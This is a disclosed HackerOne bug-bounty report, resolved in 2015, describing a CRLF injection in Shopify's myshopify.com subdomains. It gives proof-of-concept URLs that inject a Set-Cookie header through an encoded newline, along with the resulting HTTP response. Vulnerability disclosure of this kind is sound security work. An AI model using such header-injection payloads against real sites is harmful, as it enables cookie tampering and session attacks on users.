[www.*.myshopify.com] CRLF Injection

Disclosed: 2015-06-10 17:31:32 By bobrov To shopify

Unknown

Vulnerability Details

CRLF Injection via Request-URI PoC: http://www.myshopify.com/xxcrlftest%0aSet-Cookie:test=test3;domain=.myshopify.com; https://www.blackfan.myshopify.com/xxx%0aSet-Cookie:test=test2;domain=.myshopify.com; HTTP Response: ``` HTTP/1.1 302 Moved Temporarily ... Location: http://myshopify.com/xxcrlftest Set-Cookie:test=test;domain=.myshopify.com; ``` Result: Creating a cookie-param "test=test" on *.myshopify.com

Actions

View on HackerOne

Report Stats

Report ID: 66386
State: Closed
Substate: resolved
Upvotes: 5

[www.*.myshopify.com] CRLF Injection

Vulnerability Details

Actions

Report Stats

Share this report